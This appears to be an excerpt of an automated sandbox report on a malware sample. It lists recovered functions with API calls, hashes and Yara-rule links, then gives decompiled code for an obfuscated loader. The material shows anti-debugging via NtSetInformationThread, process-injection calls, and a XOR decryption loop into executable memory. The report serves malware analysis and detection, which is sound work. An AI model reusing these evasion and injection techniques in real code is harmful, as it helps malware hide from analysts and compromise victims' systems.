                              • String ID: W.E$1.!T$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 4046476035-3275326604
                              • Opcode ID: 0c25f4cd9abb880cbf678008b4acfff4649b59cc02456b895c5b82e314590e8b
                              • Instruction ID: ce9fa61af0a17f62d416cfc2a2aefe49be1dac77dfcef5ef75a2434a4dd8351b
                              • Opcode Fuzzy Hash: 0c25f4cd9abb880cbf678008b4acfff4649b59cc02456b895c5b82e314590e8b
                              • Instruction Fuzzy Hash: 47715476580324EFDB14CF20DE89B987766EF59364F0043A5ED282B2E9C7B858428B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021508B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • EnumWindows.USER32(021508D9,?,00000000,?,?,?,0215074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021508BF
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0215074C), ref: 02150A4D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: EnumInformationThreadWindows
                              • String ID: 1.!T
                              • API String ID: 1954852945-3147410236
                              • Opcode ID: 497ae8d7dd8f3aebc14dc070877f9642268c13d40b4bc8e82ba561fdf277398e
                              • Instruction ID: 9c18c29eb75a358dfc2bda128a143291d36322ac03501a59b5afc82c6fe1abf1
                              • Opcode Fuzzy Hash: 497ae8d7dd8f3aebc14dc070877f9642268c13d40b4bc8e82ba561fdf277398e
                              • Instruction Fuzzy Hash: 00313971680321EFEB10AF748C95BAA3BA29F59754F144299BDB55B2C0CB74DC42CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02158CF3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtResumeThread.NTDLL(00000004,?,?,?,0215074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021593D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 02159110
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 947044025-2268763764
                              • Opcode ID: 3523c760a5c293950f461c77b6c2dbde9f12bdd629fa0cb1d798bbd4ff789be1
                              • Instruction ID: c08c1a829018de3dcf092052f4d94b4ffd8e3ac51f88ec5d849dd80e8ba08cac
                              • Opcode Fuzzy Hash: 3523c760a5c293950f461c77b6c2dbde9f12bdd629fa0cb1d798bbd4ff789be1
                              • Instruction Fuzzy Hash: A751C033505525CFCB58CE24E698B68B716EF69320F4093AAD9241B1F9D77454828BC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02156DB9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: 1.!T
                              • API String ID: 0-3147410236
                              • Opcode ID: f6ab0dbb56da944bc9757293bed84c656bc5037f37e2ff443a4661029efe5e72
                              • Instruction ID: 3599646bd5c3c50d8ab488a71645adf1b086ba4c00e1cb92051434566a88fefa
                              • Opcode Fuzzy Hash: f6ab0dbb56da944bc9757293bed84c656bc5037f37e2ff443a4661029efe5e72
                              • Instruction Fuzzy Hash: 3F41CC75A80324EFEB14DF68CD90B9A77A1AF48754F5681A9FD686B380C730EC01CB84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02158DF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtResumeThread.NTDLL(00000004,?,?,?,0215074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021593D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 02159110
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 947044025-2268763764
                              • Opcode ID: 2f65443e4c7b8292aaa49a776df75d68b763a7b5664891620c7b10ad8fbf9ee6
                              • Instruction ID: ef534dd4e2edfddac37d2053315422f3423b407c991e4c67bdc076fefebfde35
                              • Opcode Fuzzy Hash: 2f65443e4c7b8292aaa49a776df75d68b763a7b5664891620c7b10ad8fbf9ee6
                              • Instruction Fuzzy Hash: 5851BB33405625DFCB5CCF24E698B68B726EF69320F0093AAD9240B1FDD37855828BC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021508EF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0215074C), ref: 02150A4D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 3637ad903b4ffc73ab5aa65ac6d9e10f0563131fb0e893ce303e404957812ea5
                              • Instruction ID: d46512ffbcc35f408226ad560ce9890b93c7cb9de91b448a2b84162bf84f526e
                              • Opcode Fuzzy Hash: 3637ad903b4ffc73ab5aa65ac6d9e10f0563131fb0e893ce303e404957812ea5
                              • Instruction Fuzzy Hash: 4C41D277400625EFCA48CF24EA99F54B716EF6D360F008395EA242F2ECD77459428F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02158F0D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtResumeThread.NTDLL(00000004,?,?,?,0215074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021593D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 02159110
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 947044025-2268763764
                              • Opcode ID: 0169d66fd928d0876fc0caffb4e804adca6fd3da98d23dd1379462cd8b665cd3
                              • Instruction ID: b49010c159fa8791979a3791aeb47281640faccefc7b03a96f24b99110465609
                              • Opcode Fuzzy Hash: 0169d66fd928d0876fc0caffb4e804adca6fd3da98d23dd1379462cd8b665cd3
                              • Instruction Fuzzy Hash: 5841BC33405625DFCB58CF24EA98B68B726EF69320F00939AD9241B1F9D77854828BD2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02159012, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtResumeThread.NTDLL(00000004,?,?,?,0215074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021593D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 02159110
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 947044025-2268763764
                              • Opcode ID: 02441f77ef0c01e9454345f809c156dc706a0b6efd0a448e091951d7fdcfa906
                              • Instruction ID: 244265a88b68c4dfefc2b60269a6767047b1ea20218f98529fdedb65c67ea4d5
                              • Opcode Fuzzy Hash: 02441f77ef0c01e9454345f809c156dc706a0b6efd0a448e091951d7fdcfa906
                              • Instruction Fuzzy Hash: AA41A833405625CFCB48CF24EA99B68B726EF69320F00939AD9241B1FDC77855828BD2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021570B8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0215074C), ref: 02150A4D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: e9997e5dd5a77e7459c67e679e2deb1b3ed95a146ae482b66a8b77a36f338ac5
                              • Instruction ID: 0e599cb867d51b285f3ab68144a7504297d3312b80ba559fe1607a0eb21f718e
                              • Opcode Fuzzy Hash: e9997e5dd5a77e7459c67e679e2deb1b3ed95a146ae482b66a8b77a36f338ac5
                              • Instruction Fuzzy Hash: 06212670680324EEFF245E608CD1BAA36929F09768F5041A9EEB51B2C0D7759C42CE41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02158CE9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtResumeThread.NTDLL(00000004,?,?,?,0215074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021593D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 02159110
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 947044025-2268763764
                              • Opcode ID: 935b397d3c465e875a6cd4ac6df497da5e70b392ebd4587b6f8eef49c2e7e564
                              • Instruction ID: 09718cbf07d55268995a1644f5595d989a292b116a1e9914b6cb6936d0389142
                              • Opcode Fuzzy Hash: 935b397d3c465e875a6cd4ac6df497da5e70b392ebd4587b6f8eef49c2e7e564
                              • Instruction Fuzzy Hash: 4331FC31684225CEEF695E34C8987AD3696EF45318F9A52EACD764B1E1C33484C4C783
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02157088, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0215074C), ref: 02150A4D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 9497109f6d3084fd2b5641aefcac50174b11ddcf78b9c6eb7223a8f7cc936ef3
                              • Instruction ID: e140d7083f7a6e2254b839bc465ba5d26c8c524945dfc2d4862794e044b6a8af
                              • Opcode Fuzzy Hash: 9497109f6d3084fd2b5641aefcac50174b11ddcf78b9c6eb7223a8f7cc936ef3
                              • Instruction Fuzzy Hash: CD2105B4680321EEFF20AEA48C91BD977929F59768F554295BE742B2C0C774DC01CB85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0215310A, Relevance: 1.7, APIs: 1, Instructions: 248nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021537C3
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: e107bc7f7b01ac7e8782136ff2396909ef1fc6edd9ff7709a0323672e9eeaccc
                              • Instruction ID: 13b339c52d2df76e478acff16e0ca7febfa4fa3cbfa058eef6ed1bec106873b2
                              • Opcode Fuzzy Hash: e107bc7f7b01ac7e8782136ff2396909ef1fc6edd9ff7709a0323672e9eeaccc
                              • Instruction Fuzzy Hash: 7991F3B1280249FFEF255F24CC45BE93A62FF44744F1141A8FEA4AB2D0C7B99494DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02153187, Relevance: 1.7, APIs: 1, Instructions: 228nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021537C3
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 618c341106937c224e0c435043f6f05295e516e6f3a9ab25d2fead6b8bc7ba91
                              • Instruction ID: a5282ae1b3f1309857c833acda773a29946b3934164212012e6b7d2cf94ff232
                              • Opcode Fuzzy Hash: 618c341106937c224e0c435043f6f05295e516e6f3a9ab25d2fead6b8bc7ba91
                              • Instruction Fuzzy Hash: C89108B2141215EFDB188F14DD59BE97B26FF18350F008369FE645B2E8D7B854818F94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021532EA, Relevance: 1.7, APIs: 1, Instructions: 199nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021537C3
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 22eeea5350ccaecbde2c97f57185d58107c7a804b4f50a6555705a45550ca15b
                              • Instruction ID: a994f3ce34bb7d9c0227598e2cea38740ab45c8bd6d52b70276bbb51e8c7e560
                              • Opcode Fuzzy Hash: 22eeea5350ccaecbde2c97f57185d58107c7a804b4f50a6555705a45550ca15b
                              • Instruction Fuzzy Hash: D081F2B2141209EFEB688F14DD59FE87726FF18350F008369FA645B2E8C7B854818F94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021534F5, Relevance: 1.6, APIs: 1, Instructions: 130nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021537C3
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 11132b9fa2c39009c4da43e460fe1e8b3f018c05640d141d5daecd013adc83aa
                              • Instruction ID: 075c211452935a87cbfb239b6c46a1093d293b75ff05ba6f2c8f8206cb970df4
                              • Opcode Fuzzy Hash: 11132b9fa2c39009c4da43e460fe1e8b3f018c05640d141d5daecd013adc83aa
                              • Instruction Fuzzy Hash: 2151D377401118EFCB1CCF14EE99BA8B716FF68360F0083A5EA241B1E8DB7815828B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0215911A, Relevance: 1.6, APIs: 1, Instructions: 103nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtResumeThread.NTDLL(00000004,?,?,?,0215074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021593D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 54a94929fee6eadf382035450c646e60fb2376eadaf4714c376d2dd3816b245c
                              • Instruction ID: 63d86109c50d3783d3b0adea69444440f13b254793fa3000fc9cdc448d108e1e
                              • Opcode Fuzzy Hash: 54a94929fee6eadf382035450c646e60fb2376eadaf4714c376d2dd3816b245c
                              • Instruction Fuzzy Hash: EB41BB33405625DFCB48CF24E698B68B726FF69320F00939AD5241B1FDC37815828BD2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02154D2A, Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 02154FA8
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: b2ac45d12963989ef82481055789078bf57d4a38e47d2209662e112c5c29e9df
                              • Instruction ID: 600a93553fdf3475032f07d359f7c5b35e9ac81aece017b39594c61a09b9d3aa
                              • Opcode Fuzzy Hash: b2ac45d12963989ef82481055789078bf57d4a38e47d2209662e112c5c29e9df
                              • Instruction Fuzzy Hash: 2241FE7741A6659F8708CF24E6AA814BF21FF6A3603009399D0601F1FED6742A42CBD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021536AE, Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021537C3
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 4aa657c7a155d8a1720fd16a7485b86e8b714806fdc3d59e61a552f72ac0176f
                              • Instruction ID: a52073073377963006f03aa38f04dbe9a175564e5ac21de371eda774b7bc434c
                              • Opcode Fuzzy Hash: 4aa657c7a155d8a1720fd16a7485b86e8b714806fdc3d59e61a552f72ac0176f
                              • Instruction Fuzzy Hash: EE41DE77411519EFCA48CF24EA99E58BB26FF28360B009365E2181B1FDDA7814828F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021592AE, Relevance: 1.6, APIs: 1, Instructions: 65nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtResumeThread.NTDLL(00000004,?,?,?,0215074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021593D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 7a6503a073fbe0e6be4388ce8c19de922eee8f5dd3025e9c3dedeac10cfd2441
                              • Instruction ID: a09f33a8072b1b6a35b6a0cce5e6709ca6a197fc0de9dcddb16eeb62e4425757
                              • Opcode Fuzzy Hash: 7a6503a073fbe0e6be4388ce8c19de922eee8f5dd3025e9c3dedeac10cfd2441
                              • Instruction Fuzzy Hash: 03319977415526DF8A8CCF24E69D828B72AFF6A370300939AD2241F1FDD67415828FD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021587FD, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021582E2,00000040,02150A2A,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02158816
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                              • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                              • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                              • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004041D8, Relevance: 1.4, APIs: 1, Instructions: 172memoryCOMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 73%
                              			E004041D8(void* __edx, void* __edi) {
				intOrPtr* _t133;
				signed char _t136;
				signed char _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t140;
				void* _t171;
				void* _t172;
				void* _t174;
				signed int* _t175;

				_t140 = __edx;
				asm("int 0xff");
				_t172 = _t171 - 1;
				 *((intOrPtr*)(_t172 + __edi + 0x48)) =  *((intOrPtr*)(_t172 + __edi + 0x48)) + 1;
				asm("clc");
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				 *_t175 =  *_t175;
				 *_t175 =  *_t175;
				 *_t175 =  *_t175 ^ 0x00000000;
				asm("cld");
				asm("clc");
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				 *_t175 =  *_t175;
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				 *_t175 =  *_t175;
				_t139 =  *0x9c5000;
				 *_t175 =  *_t175;
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				asm("cld");
				asm("clc");
				 *_t175 =  *_t175;
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				 *_t175 =  *_t175 ^ 0x00000000;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				asm("clc");
				_t133 =  *((intOrPtr*)(0x401000));
				 *_t175 =  *_t175;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				do {
					asm("clc");
					_t133 = _t133 - 1;
					 *_t175 =  *_t175;
					 *_t175 =  *_t175 ^ 0x00000000;
				} while ( *_t133 != _t139);
				asm("cld");
				 *_t175 =  *_t175;
				 *_t175 =  *_t175 ^ 0x00000000;
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				asm("clc");
				 *_t175 =  *_t175;
				 *_t175 =  *_t175 ^ 0x00000000;
				 *_t175 =  *_t175 ^ 0x00000000;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				asm("cld");
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				asm("cld");
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				 *_t175 =  *_t175 ^ 0x00000000;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				asm("clc");
				asm("cld");
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				 *_t175 =  *_t175;
				asm("cld");
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				 *_t175 =  *_t175;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				 *_t175 =  *_t175;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				 *_t175 =  *_t175;
				 *_t175 =  *_t175;
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				 *_t175 =  *_t175;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				asm("clc");
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				 *_t175 =  *_t175;
				asm("cld");
				asm("clc");
				asm("clc");
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				asm("clc");
				asm("clc");
				 *_t175 =  *_t175;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				asm("clc");
				asm("clc");
				 *_t175 =  *_t175;
				asm("clc");
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				asm("clc"); // executed
				VirtualAlloc(0, 0xe000, 0x1000, 0x40); // executed
				 *(_t172 + 0x38) =  *(_t172 + 0x38);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
				_t136 = E0040442E();
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				 *_t175 =  *_t175 ^ 0x00000000;
				_t138 = 0;
				 *_t175 =  *_t175 ^ 0x00000000;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
				do {
					 *(_t172 + 0x38) =  *(_t172 + 0x38);
					 *_t175 =  *_t175;
					_push( *((intOrPtr*)(_t140 + _t138)));
					 *_t175 =  *_t175 ^ 0x00000000;
					 *(_t172 + 0x38) =  *(_t172 + 0x38) ^ 0x00000000;
					 *_t175 =  *_t175 ^ 0x46ca7e6a;
					 *(_t172 + 0x38) =  *(_t172 + 0x38);
					asm("clc");
					_pop( *_t112);
					 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
					 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
					 *_t175 =  *_t175 ^ 0x00000000;
					_t138 = _t138 - 0xfffffffc;
					 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
					 *(_t172 + 0x38) =  *(_t172 + 0x38) - 1;
					 *(_t172 + 0x38) =  *(_t172 + 0x38);
				} while (_t138 != 0x9820);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) + 1;
				_t174 = _t172 + 1 - 1;
				_t137 = _t136 >> 1;
				 *_t175 =  *_t175 ^ 0x00000000;
				asm("cld");
				 *((intOrPtr*)(_t174 + 0x38)) =  *((intOrPtr*)(_t174 + 0x38));
				return _t137;
			}













                              0x004041d8
                              0x004041d8
                              0x004041da
                              0x004041dc
                              0x004041e2
                              0x004041e8
                              0x004041eb
                              0x004041f4
                              0x004041f8
                              0x00404202
                              0x00404206
                              0x0040420d
                              0x0040420e
                              0x00404218
                              0x0040421c
                              0x00404220
                              0x00404224
                              0x00404228
                              0x0040422a
                              0x00404233
                              0x00404237
                              0x0040423a
                              0x00404242
                              0x00404245
                              0x00404248
                              0x0040424e
                              0x0040424f
                              0x00404258
                              0x0040425c
                              0x00404265
                              0x00404268
                              0x0040426b
                              0x0040426f
                              0x00404272
                              0x00404275
                              0x00404276
                              0x00404279
                              0x0040427d
                              0x00404280
                              0x00404283
                              0x00404283
                              0x00404284
                              0x00404285
                              0x00404289
                              0x0040428d
                              0x00404291
                              0x00404292
                              0x0040429b
                              0x0040429f
                              0x004042a9
                              0x004042aa
                              0x004042b4
                              0x004042b8
                              0x004042c2
                              0x004042c6
                              0x004042cd
                              0x004042d0
                              0x004042d3
                              0x004042d4
                              0x004042d8
                              0x004042df
                              0x004042e2
